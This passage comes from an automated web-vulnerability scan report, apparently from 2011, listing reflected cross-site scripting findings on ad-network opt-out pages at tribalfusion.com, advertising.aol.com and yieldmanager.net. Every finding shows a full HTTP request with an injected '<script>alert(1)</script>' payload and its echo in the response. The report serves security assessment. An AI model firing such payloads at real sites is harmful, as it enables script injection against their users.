Date: Sun, 13 Nov 2011 18:56:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 12 Nov 2011 18:56:16 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src='http://info.yahoo.com/nai/optout.html?token=cVRuZVptSHJ4UjM-8be01'><script>alert(1)</script>0b8cdcc28cf' width=15 height=15>
...[SNIP]...

2.119. http://www.tribalfusion.com/test/opt.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /test/opt.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 778f6<script>alert(1)</script>641bba3e322 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /test/opt.js778f6<script>alert(1)</script>641bba3e322 HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: no-store
Date: Sun, 13 Nov 2011 18:55:30 GMT
Server: Resin/3.1.8
Content-Type: text/html
Content-Length: 597

<html><head><title>Unknown Method</title>
<style>
BODY {font-family:verdana; font-size: 10pt }
TD {font-family:verdana; font-size: 10pt }
TH {font-family:verdana; font-size: 10pt }
INPUT {font-family:
...[SNIP]...
</script>641bba3e322">http://www.tribalfusion.com/test/opt.js778f6<script>alert(1)</script>641bba3e322</a>
...[SNIP]...

2.120. http://www.tribalfusion.com/test/opt.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /test/opt.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34169"><script>alert(1)</script>826128da45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /test/opt.js34169"><script>alert(1)</script>826128da45 HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: no-store
Date: Sun, 13 Nov 2011 18:55:29 GMT
Server: Resin/3.1.8
Content-Type: text/html
Content-Length: 599

<html><head><title>Unknown Method</title>
<style>
BODY {font-family:verdana; font-size: 10pt }
TD {font-family:verdana; font-size: 10pt }
TH {font-family:verdana; font-size: 10pt }
INPUT {font-family:
...[SNIP]...
<a href="http://www.tribalfusion.com/test/opt.js34169"><script>alert(1)</script>826128da45">
...[SNIP]...

2.121. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_ad_us-ec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61a72'><script>alert(1)</script>c7058b51fa5 was submitted in the token_nai_ad_us-ec_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=61a72'><script>alert(1)</script>c7058b51fa5; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:54:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13677


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3559044&token=61a72'><script>alert(1)</script>c7058b51fa5' height='1' width='1'>
...[SNIP]...

2.122. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserver_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12183'><script>alert(1)</script>0b66eb74812 was submitted in the token_nai_adserver_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=12183'><script>alert(1)</script>0b66eb74812; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:54:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6406947&token=12183'><script>alert(1)</script>0b66eb74812' height='1' width='1'>
...[SNIP]...

2.123. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserverec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94c68'><script>alert(1)</script>3ca09deaf7 was submitted in the token_nai_adserverec_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=94c68'><script>alert(1)</script>3ca09deaf7; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:54:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13677


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=8985808&token=94c68'><script>alert(1)</script>3ca09deaf7' height='1' width='1'>
...[SNIP]...

2.124. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserverwc_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40c68'><script>alert(1)</script>6140babd8db was submitted in the token_nai_adserverwc_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=40c68'><script>alert(1)</script>6140babd8db; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:54:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13677


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7610767&token=40c68'><script>alert(1)</script>6140babd8db' height='1' width='1'>
...[SNIP]...

2.125. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adsonar_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed26f'><script>alert(1)</script>b304583b52a was submitted in the token_nai_adsonar_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=ed26f'><script>alert(1)</script>b304583b52a; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:53:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9806231&token=ed26f'><script>alert(1)</script>b304583b52a' height='1' width='1'>
...[SNIP]...

2.126. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adtech_de cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90070'><script>alert(1)</script>482acefab68 was submitted in the token_nai_adtech_de cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=90070'><script>alert(1)</script>482acefab68; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:53:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7806765&token=90070'><script>alert(1)</script>482acefab68' height='1' width='1'>
...[SNIP]...

2.127. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_advertising_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f974'><script>alert(1)</script>df0d1042b00 was submitted in the token_nai_advertising_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=9f974'><script>alert(1)</script>df0d1042b00; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:53:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13677


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3275971&token=9f974'><script>alert(1)</script>df0d1042b00' height='1' width='1'>
...[SNIP]...

2.128. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_glb_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c478'><script>alert(1)</script>e2aed76b59b was submitted in the token_nai_glb_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=7c478'><script>alert(1)</script>e2aed76b59b; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:54:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5467975&token=7c478'><script>alert(1)</script>e2aed76b59b' height='1' width='1'>
...[SNIP]...

2.129. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_tacoda_at_atwola_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 28b7a'><script>alert(1)</script>1520034ced4 was submitted in the token_nai_tacoda_at_atwola_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=28b7a'><script>alert(1)</script>1520034ced4; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:53:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7405975&token=28b7a'><script>alert(1)</script>1520034ced4' height='1' width='1'>
...[SNIP]...

2.130. http://open.ad.yieldmanager.net/V1/NWSetter [url parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /V1/NWSetter

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 14770<script>alert(1)</script>2edb24b05ff was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /V1/NWSetter?nwid1=20072115599&url=http://info.yahoo.com/nai/nai-verify.html?optoutverify=true%26opter=nai14770<script>alert(1)</script>2edb24b05ff&XTS=1321210423&XSIG=0~d5fc1b609f1ce455e216ef1819125ff12eafa53b HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=291

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:47 GMT
